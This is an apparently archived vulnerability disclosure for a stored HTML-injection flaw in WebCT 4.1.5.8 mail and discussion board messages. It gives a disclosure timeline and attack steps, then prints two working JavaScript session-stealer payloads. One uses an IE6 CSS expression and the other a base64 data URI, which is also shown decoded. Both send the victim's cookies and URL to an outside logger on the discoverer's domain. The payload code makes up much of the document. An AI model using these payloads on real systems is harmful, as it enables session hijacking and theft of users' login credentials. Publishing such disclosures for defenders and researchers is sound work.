93 lines
No EOL
4.8 KiB
Text
93 lines
No EOL
4.8 KiB
Text
source: https://www.securityfocus.com/bid/28107/info
|
|
|
|
WebCT is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
|
|
|
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
This issue affects WebCT 4.1.5.8; other versions may also be vulnerable.
|
|
|
|
WebCT 4.x Javascript Session Stealer Exploits
|
|
|
|
Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
|
|
Affected Version: 4.1.5.8
|
|
Discoverer: Benjamin "balupton" Lupton
|
|
Date Discovered: November 2005
|
|
Date Reported: 25/06/2007
|
|
Software Author Contacted (again) on: 20/07/2007
|
|
Date Published: 05/03/2008
|
|
|
|
Published At:
|
|
http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
|
|
http://www.balupton.com/documents/webct_exploits.txt
|
|
http://seclists.org/fulldisclosure/2008/Mar/0051.html
|
|
|
|
Attack Type:
|
|
Javascript Session Stealer Exploit.
|
|
|
|
Description:
|
|
Mail & Discussion Board messages are not properly checked for javascript, allowing javascript to perform a session stealing attack (allowing the attacker to be logged in as the victim).
|
|
|
|
Tested On:
|
|
Attacks were tested fully on eCentral TAFE's WebCT System in November 2005 (with permission of staff),
|
|
and again on Curtin University's WebCT System in June 2006 (but this time only to see if the javascript will run).
|
|
|
|
Action Taken:
|
|
Contacted TAFE lecturers and administrators, who didn't really care.
|
|
Contacted WestOne multiple times, but never recieved any response.
|
|
Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question.
|
|
Published as WebCT is being phased out, with Blackboard being the replacement.
|
|
|
|
Steps:
|
|
The attacker publishes the exploit code in a message with "Don't wrap text" enabled.
|
|
The victim accesses the attacker's message and their cookies are sent to the attacker's remote logger.
|
|
The attacker then logs into the system and replaces his/her cookies with the acquired cookies.
|
|
- Cookies are formatted as follows within the "value" attribute: CookieName=CookieValue; NextCookieName=NextCookieValue;
|
|
The attacker is now logged into the system as the victim.
|
|
In this case the logger is located here: http://www.balupton.com/sandbox/logger.php?pass_code=secret_key
|
|
|
|
Notes:
|
|
Victims must be students (attack does not work on non students, eg. teachers/admins).
|
|
Attack 2 will also run in Opera, but fails to retrieve the document.cookie value.
|
|
Attack 2 uses a base64 encoded javascript which is executed.
|
|
Both attacks can be customized to allow any javascript to run.
|
|
Javascript can also be developed to post a mail or discussion board message, this works for all types of victims.
|
|
|
|
Resources:
|
|
Attack Code: See below
|
|
Logger: http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_source=true
|
|
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
|
|
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In
|
|
|
|
Attack 1 - IE6SP2 Exploit (Automatic):
|
|
<div id="mycode" style="BACKGROUND: url('java
|
|
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript session stealer automatic hack
|
|
var iframe = document.createElement('iframe');
|
|
iframe.style.border = 'none';
|
|
iframe.style.height = '1px';
|
|
iframe.style.width = '1px';
|
|
var url =
|
|
'http'+'://www.balupton.com/sandbox/logger.php'
|
|
+'?variable=document.cookie'
|
|
+'&value='+escape(document.cookie)
|
|
+'&url='+escape(document.location)
|
|
+'&pass_code=secret_key'
|
|
;
|
|
iframe.src = url;
|
|
document.body.appendChild(iframe);">Thank you</div>
|
|
|
|
|
|
Attack 2 - Firefox Exploit (Manual):
|
|
<a href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8gYmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVybCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVycmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9rZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>
|
|
|
|
Attack 2 - Firefox Exploit (Manual) - Decoded:
|
|
<script type="text/javascript">
|
|
// balupton's javascript session stealer manual hack
|
|
var url =
|
|
'http://www.balupton.com/sandbox/logger.php'
|
|
+'?variable=document.cookie'
|
|
+'&value='+escape(document.cookie)
|
|
+'&url='+escape(document.referrer ? document.referrer : 'http://exploited_url.com')
|
|
+'&pass_code=secret_key'
|
|
;
|
|
document.location = url;
|
|
</script> |